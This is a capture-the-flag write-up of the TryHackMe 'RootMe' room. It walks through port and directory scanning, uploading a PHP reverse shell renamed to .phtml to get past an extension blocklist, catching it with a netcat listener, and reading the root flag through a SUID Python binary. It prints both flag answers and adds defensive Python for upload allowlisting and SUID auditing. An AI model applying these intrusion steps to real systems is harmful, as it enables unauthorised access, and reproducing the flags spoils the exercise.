RootMe – a tryhackme.com writeup

RootMe

This is a very basic CTF room from tryhackme.com – you are basically guided through it step by step. Let’s have a look.

sudo nmap -sV 10.10.189.114

So there we have our first three answers: 2 ports, Apache 2.4.29, and on port 22 an SSH server is running.

Time for gobuster

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.189.114 -x php,txt,html,js,pdf

So panel is our next answer.

When we visit the panel URL we see a simple upload form, and our task is to upload a webshell. In Kali there is one at

/usr/share/webshells/php/php-reverse-shell.php

But you can easily find them on the web as well.

First of all we copy it to our working directory, shorten the name and change the extension.

cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php rs.phtml

The name shortening is just for convenience – changing the extension has a practical reason: .php files are most often blocked by upload forms, while .phtml files are more likely to go through.
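The reason the .phtml trick works is that the form checks a blocklist of extensions instead of an allowlist. The following is an added example (not part of this writeup or of the room) that shows the weak check next to a hardened one and a storage-name policy; the extension sets, the allowed types and the function names are assumptions for illustration.

```python
"""Upload-name validation: blocklist (weak) vs allowlist (hardened).

Added example, not code from the writeup. The extension sets below are
illustrative assumptions, not a definitive list for any particular server.
"""
import os
import re
import secrets

# Extensions a typical Apache/PHP setup may hand to the PHP interpreter (assumption).
PHP_LIKE = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Only the file types the application actually needs to accept (assumption).
ALLOWED = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def blocklist_check(filename: str) -> bool:
    """Weak check: rejects only '.php'. 'rs.phtml' passes although the
    server may still execute it as PHP."""
    return os.path.splitext(filename.lower())[1] != ".php"


def server_may_execute(filename: str) -> bool:
    """True if the extension is one the interpreter is commonly mapped to."""
    return os.path.splitext(filename.lower())[1] in PHP_LIKE


def allowlist_check(filename: str) -> bool:
    """Hardened check: no path components, exactly one extension from ALLOWED,
    and a base name limited to a conservative character set."""
    if os.path.basename(filename) != filename:
        return False  # rejects '../x.png' and similar
    name, ext = os.path.splitext(filename)
    if not name or ext.lower() not in ALLOWED:
        return False
    # The regex forbids '.', so double extensions like 'rs.phtml.png' are rejected.
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name) is not None


def storage_name(filename: str) -> str:
    """Store accepted files under a random name with a normalised extension, so the
    upload cannot be requested by the name the uploader chose (as /uploads/rs.phtml
    was in the room). Raises ValueError for names that fail the allowlist."""
    if not allowlist_check(filename):
        raise ValueError("rejected upload name")
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()


if __name__ == "__main__":
    for candidate in ["rs.php", "rs.phtml", "cat.png", "rs.phtml.png", "../cat.png"]:
        print(f"{candidate:14} blocklist={blocklist_check(candidate)!s:5} "
              f"allowlist={allowlist_check(candidate)!s:5} "
              f"executable={server_may_execute(candidate)}")
```

The point the table of results makes: the blocklist accepts rs.phtml and the server would execute it, while the allowlist rejects everything that is not one of the handful of types the form needs. Storing under a random name is a second, independent layer: even if an executable file slipped through, its URL would not be guessable from the uploaded name.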

We now have to change rs.phtml a bit.

vi rs.phtml

We have to change the $ip variable to that of our local machine so the reverse shell can connect back to us.

We then can upload the rs.phtml.

That went through – good. Now we need to set up netcat on our end to listen for the reverse shell.

The reverse shell is looking for us on port 1234, so our netcat command is

nc -lnvp 1234

From our gobuster scan we know that there is an uploads directory – we assume our rs.phtml file is there now – so let’s try.

We open

http://10.10.189.114/uploads/rs.phtml

with the browser and immediately see this in our netcat session:

So let’s look for the user flag. Or be lazy and let Linux find it for us:

find / -name user.txt 2>/dev/null

It is under /var/www/user.txt and reads

THM{y0u_g0t_a_sh3ll}

So that’s our first answer.

Next we are supposed to look for files with the SUID flag. So let’s do that.

find / -perm -4000 -user root 2>/dev/null

The interesting result is

/usr/bin/python

Because it means we can execute Python with root privileges.
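The same `find` output is what a defender would review when auditing a host. The following is an added example, not from the writeup, that parses lines in the format of `find / -perm -4000 -ls` and flags SUID-root files that are interpreters (the Python case above) or that are not in a baseline of expected binaries. The baseline set, the interpreter list and the sample output lines are constructed for this example.

```python
"""Audit SUID-root binaries from `find / -perm -4000 -ls` output.

Added example, not code from the writeup. BASELINE, INTERPRETERS and the
SAMPLE lines are constructed for illustration; a real baseline comes from a
known-good image of the same distribution.
"""
import os
import re

# SUID-root binaries expected on a stock Ubuntu-style host (constructed assumption).
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}

# Interpreters that should never carry a SUID root bit (assumption; extend as needed).
INTERPRETERS = {"python", "perl", "ruby", "bash", "sh", "dash", "php", "node", "lua"}

# Constructed sample in the `find -ls` layout: inode, blocks, perms, links,
# owner, group, size, month, day, year, path. Not real output from the room.
SAMPLE = """\
   1234   40 -rwsr-xr-x   1 root     root        40344 Mar 22  2019 /usr/bin/newgrp
   1235   60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
   1236 3444 -rwsr-xr-x   1 root     root      3525556 Nov 12  2018 /usr/bin/python
   1237  148 -rwsr-xr-x   1 root     root       149080 Jan 18  2018 /usr/bin/sudo
   1238   12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   1239   16 -rwxr-xr-x   1 root     root        14328 Jan  1  2019 /usr/bin/notsuid
   1240   24 -rwsr-xr-x   1 www-data www-data    20480 Jan  1  2019 /srv/app/helper
""".splitlines()


def parse_find_ls(line):
    """Return (perms, owner, path) from one `find -ls` line, or None if malformed.
    split(None, 10) keeps the path intact even if it contains spaces."""
    parts = line.split(None, 10)
    if len(parts) < 11:
        return None
    return parts[2], parts[4], parts[10]


def is_interpreter(path):
    """'/usr/bin/python3.6' -> 'python', '/usr/bin/perl5' -> 'perl'."""
    base = os.path.basename(path)
    return re.sub(r"[\d.]+$", "", base) in INTERPRETERS


def audit_suid(lines, baseline=BASELINE):
    """Return [(path, reason)] for SUID files owned by root that are either an
    interpreter or absent from the baseline. The 's'/'S' in the owner-execute
    slot (perms[3]) is the SUID bit; non-root owners are out of scope here."""
    findings = []
    for line in lines:
        parsed = parse_find_ls(line)
        if parsed is None:
            continue
        perms, owner, path = parsed
        if len(perms) < 4 or perms[3] not in "sS" or owner != "root":
            continue
        if is_interpreter(path):
            findings.append((path, "interpreter with SUID root: any script runs as root"))
        elif path not in baseline:
            findings.append((path, "SUID root binary not in baseline"))
    return findings


if __name__ == "__main__":
    for path, reason in audit_suid(SAMPLE):
        print(f"{path}: {reason}")
```

Run against the constructed sample, the audit reports /usr/bin/python as an interpreter with SUID root and the unexpected /usr/lib/eject/dmcrypt-get-device as outside the baseline; the non-SUID and non-root entries are ignored. The fix for the finding the room demonstrates is simply `chmod u-s /usr/bin/python`, and a periodic diff of this list against the baseline is a cheap way to catch it being set again.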

We assume the root flag is in /root/root.txt – so let’s just try to read it using Python.

python -c 'print(open("/root/root.txt").read())'

And we are lucky. It prints out the root flag, which is

THM{pr1v1l3g3_3sc4l4t10n}
